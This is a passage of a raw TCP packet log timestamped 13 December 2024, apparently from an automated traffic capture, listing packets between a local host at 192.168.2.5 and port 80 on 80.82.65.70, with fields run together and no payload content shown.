                                          Dec 13, 2024 06:12:56.520340919 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.520397902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.525109053 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.525187969 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.525296926 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.529966116 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.530034065 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.530083895 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.530143023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.534852028 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.534946918 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.535032034 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.539665937 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.539781094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.539845943 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.544548035 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.544620991 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.544692993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.544740915 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.549412966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.549490929 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.549509048 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.549560070 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.554280996 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.554377079 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.554385900 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.554430962 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.559159040 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.559267998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.559339046 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.564019918 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.564122915 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.564194918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.568867922 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.568960905 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.569022894 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.569068909 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.573756933 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.573858976 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.573899031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.573964119 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.684950113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.685038090 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.685038090 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.685092926 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.685998917 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.686070919 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.686132908 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.686192036 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.689939022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.690013885 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.690063953 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.690124035 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.693886042 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.693948030 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.694031954 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.694084883 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.697868109 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.697940111 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.698012114 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.698069096 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.701653957 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.701729059 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.701750994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.701817989 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.705346107 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.705410004 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.705454111 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.705508947 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.709034920 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.709100008 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.709180117 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.709240913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.712722063 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.712785006 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.712850094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.712905884 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.716449022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.716512918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.716555119 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.716612101 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.720136881 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.720201969 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.720261097 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.720318079 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.723828077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.723889112 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.723968983 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.724025965 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.727575064 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.727638960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.727703094 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.727762938 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.731193066 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.731260061 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.731357098 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.731416941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.734908104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.734972000 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.735058069 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.735115051 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.738610029 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.738687038 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.738742113 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.738801003 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.742343903 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.742414951 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.742491961 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.742552042 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.745975018 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.746068954 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.746088982 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.746140003 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.749660015 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.749715090 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.749747992 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.749825001 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.753385067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.753444910 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.753566980 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.753622055 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.757172108 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.757225037 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.757333040 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.757380009 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.760891914 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.760950089 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.761286020 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.761332989 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.765042067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.765101910 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.765566111 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.765619993 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.768661022 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.768718004 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.769017935 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.769069910 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.771878004 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.771938086 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.772016048 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.772067070 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.775587082 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.775656939 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.775737047 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.775794029 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.779419899 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.779485941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.876931906 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.877055883 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.877365112 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.878323078 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.878398895 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.878920078 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.879030943 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.879095078 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.882057905 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.882277966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.882361889 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.885209084 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.885236979 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.885281086 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.885313988 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.888267994 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.888369083 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.888453007 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.891223907 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.891309023 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.891391993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.891450882 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.894203901 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.894272089 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.894314051 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.894367933 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.897097111 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.897161007 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.897495031 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.897559881 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.899949074 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.900068998 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.900142908 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.902750969 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.902808905 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.902846098 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.902890921 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.905461073 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.905514002 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.905553102 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.905616045 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.908157110 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.908212900 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.908242941 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.908301115 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.910856962 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.910928965 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.910972118 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.911267996 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.913569927 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.913633108 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.913744926 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.913799047 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.916312933 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.916368008 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.916424036 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.916515112 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.919020891 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.919121027 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.919173002 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.921726942 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.921832085 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.921901941 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.924521923 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.924688101 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.924742937 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.927232981 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.927354097 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.927406073 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.929920912 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.929984093 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.930025101 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.930737019 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.932626963 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.932706118 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.932739973 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.932792902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.935380936 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.935508966 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.935563087 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.938071012 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.938175917 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.938189983 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.940779924 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.940849066 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.940876007 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.942514896 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.943474054 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.943604946 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.943677902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.946218014 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.946307898 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.946367025 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.948923111 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.949029922 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.949096918 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.951666117 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.951786995 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.951850891 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.954341888 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.954442978 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.954514980 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.957036972 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.957099915 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.957139015 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.958444118 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.959762096 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.959819078 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.959829092 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.959872961 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.962486982 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.962582111 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.962635040 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.965202093 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.965318918 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.965389013 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.967922926 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.968110085 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.968163013 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.970616102 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.970721006 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.970782042 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.973339081 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.973401070 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.973438025 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.973845005 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.976047039 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.976128101 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.976161003 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.976206064 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:56.978765965 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.978852987 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:56.978912115 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:57.006952047 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:57.305341005 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:57.504909992 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:57.504990101 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:57.505189896 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:57.505345106 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.113756895 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.113780975 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.113972902 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.114438057 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.114506960 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.114506960 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.114563942 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.117091894 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.117155075 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.117187023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.117245913 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.119832039 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.119894981 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.119935036 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.119993925 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.122541904 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.122601986 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.122639894 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.122709990 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.125232935 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.125305891 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.125324011 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.125376940 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.127965927 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.128024101 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.128061056 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.128118992 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.130673885 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.130732059 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.130773067 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.130827904 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.133393049 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.133445024 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.133481979 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.133537054 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.136102915 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.136187077 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.136203051 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.136259079 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.138828993 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.138885975 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.138961077 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.139020920 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.141520023 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.141577005 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.141680956 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.141737938 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.144304991 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.144359112 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.144401073 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.144454002 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.146934986 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.147006989 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.191664934 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.191773891 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.191777945 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.191845894 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.192984104 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.193046093 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.193065882 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.193109989 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.195699930 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.195772886 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.195776939 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.195817947 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.198404074 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.198488951 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.198493958 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.198550940 CET4978680192.168.2.580.82.65.70
                                          Dec 13, 2024 06:12:58.201132059 CET804978680.82.65.70192.168.2.5
                                          Dec 13, 2024 06:12:58.201186895 CET4978680192.168.2.580.82.65.70
